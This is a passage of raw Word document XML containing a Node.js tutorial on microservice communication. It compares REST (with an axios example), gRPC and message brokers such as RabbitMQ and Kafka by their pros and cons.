        <w:t>How do microservices communicate with each other?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="110"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EA0E06"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Microservices in a Node.js architecture can communicate with each other through various methods, each suited to different needs and scenarios. Here’s an overview of common communication patterns and tools used for microservices communication in a Node.js environment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3828BB32" w14:textId="77777777" w:rsidR="00EA0A20" w:rsidRPr="00DA2F32" w:rsidRDefault="00EA0A20" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1. HTTP/REST APIs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA23DCA"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>REST (Representational State Transfer)</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> is one of the most common methods for microservices communication. Microservices expose their functionality over HTTP endpoints, and other services make HTTP requests to these endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242932F2" w14:textId="77777777" w:rsidR="00EA0A20" w:rsidRPr="00DA2F32" w:rsidRDefault="00EA0A20" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="302"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Pros:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B94291B" w14:textId="77777777" w:rsidR="00EA0A20" w:rsidRPr="00DA2F32" w:rsidRDefault="00EA0A20" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="302"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Simplicity</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Easy to implement and understand.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF9DDAE" w14:textId="77777777" w:rsidR="00EA0A20" w:rsidRPr="00DA2F32" w:rsidRDefault="00EA0A20" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="302"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Standardized</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Uses standard HTTP methods (GET, POST, PUT, DELETE).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BA3320" w14:textId="77777777" w:rsidR="00EA0A20" w:rsidRPr="00DA2F32" w:rsidRDefault="00EA0A20" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="302"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Widely Supported</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Many tools and libraries support RESTful services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63484770" w14:textId="77777777" w:rsidR="00EA0A20" w:rsidRPr="00DA2F32" w:rsidRDefault="00EA0A20" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="302"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Cons:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E97458" w14:textId="77777777" w:rsidR="00EA0A20" w:rsidRPr="00DA2F32" w:rsidRDefault="00EA0A20" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="302"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Overhead</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: HTTP can introduce latency due to network overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252139F3" w14:textId="77777777" w:rsidR="00EA0A20" w:rsidRPr="00DA2F32" w:rsidRDefault="00EA0A20" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="302"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Stateless</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Each request needs to carry all necessary information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B8DAED"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example using axios:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050147A0"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axios = require('axios');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D25783B"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1821E44"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axios.get('http://service1/api/resource')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CFDE56"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.then(response =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C915598"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console.log(response.data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8D8595"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64A650C"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.catch(error =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F132E83"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEC376C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A17105C" w14:textId="77777777" w:rsidR="00EA0A20" w:rsidRPr="00DA2F32" w:rsidRDefault="00EA0A20" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2. gRPC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DB895D"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>gRPC (gRPC Remote Procedure Calls)</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a high-performance RPC framework that uses HTTP/2 for transport, Protocol Buffers (protobufs) for serialization, and supports multiple programming languages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E319D03" w14:textId="77777777" w:rsidR="00EA0A20" w:rsidRPr="00DA2F32" w:rsidRDefault="00EA0A20" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="303"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Pros:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106148F8" w14:textId="77777777" w:rsidR="00EA0A20" w:rsidRPr="00DA2F32" w:rsidRDefault="00EA0A20" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="303"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Efficient</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Low latency and high throughput due to HTTP/2 and binary serialization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F391381" w14:textId="77777777" w:rsidR="00EA0A20" w:rsidRPr="00DA2F32" w:rsidRDefault="00EA0A20" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="303"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Strongly Typed</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Contracts are defined using Protocol Buffers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAE2BA8" w14:textId="77777777" w:rsidR="00EA0A20" w:rsidRPr="00DA2F32" w:rsidRDefault="00EA0A20" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="303"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Streaming</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Supports bidirectional streaming.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CDA62B" w14:textId="77777777" w:rsidR="00EA0A20" w:rsidRPr="00DA2F32" w:rsidRDefault="00EA0A20" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="303"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Cons:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336CAD2B" w14:textId="77777777" w:rsidR="00EA0A20" w:rsidRPr="00DA2F32" w:rsidRDefault="00EA0A20" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="303"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Complexity</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: More complex to set up compared to REST.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3C13AD" w14:textId="77777777" w:rsidR="00EA0A20" w:rsidRPr="00DA2F32" w:rsidRDefault="00EA0A20" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="303"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Learning Curve</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Requires understanding of Protocol Buffers and gRPC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACBB181"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example using grpc package:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48ACCE1B"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grpc = require('grpc');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286BBD5F"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protoLoader = require('@grpc/proto-loader');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484CBE00"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321F3B2"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PROTO_PATH = './service.proto';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088ECA82"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packageDefinition = protoLoader.loadSync(PROTO_PATH);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FBA4B5"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proto = grpc.loadPackageDefinition(packageDefinition);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EA9889"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AEA7F01"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client = new proto.ServiceName('localhost:50051', grpc.credentials.createInsecure());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11175542"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72E7D3F"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client.SomeMethod({ key: 'value' }, (error, response) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D87C389"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(!error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C653CF4"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console.log('Response:', response);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E042D9"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40712904"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503F6268"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AAF1576"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9D71601" w14:textId="77777777" w:rsidR="00EA0A20" w:rsidRPr="00DA2F32" w:rsidRDefault="00EA0A20" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>3. Message Brokers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B73D870"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Message brokers like </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>RabbitMQ</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Apache Kafka</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Redis Streams</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> facilitate communication between microservices through message queues or topics. Microservices publish messages to queues or topics, and other services consume them asynchronously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564323BE" w14:textId="77777777" w:rsidR="00EA0A20" w:rsidRPr="00DA2F32" w:rsidRDefault="00EA0A20" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="304"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Pros:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BF0EF5" w14:textId="77777777" w:rsidR="00EA0A20" w:rsidRPr="00DA2F32" w:rsidRDefault="00EA0A20" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="304"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Decoupling</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Microservices are decoupled from each other, promoting loose coupling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04ADAC2B" w14:textId="77777777" w:rsidR="00EA0A20" w:rsidRPr="00DA2F32" w:rsidRDefault="00EA0A20" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="304"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Asynchronous Communication</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Supports asynchronous processing, improving scalability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B294F6" w14:textId="77777777" w:rsidR="00EA0A20" w:rsidRPr="00DA2F32" w:rsidRDefault="00EA0A20" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="304"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Retry Mechanisms</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Brokers often support message retry mechanisms and durability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0962B3" w14:textId="77777777" w:rsidR="00EA0A20" w:rsidRPr="00DA2F32" w:rsidRDefault="00EA0A20" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="304"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
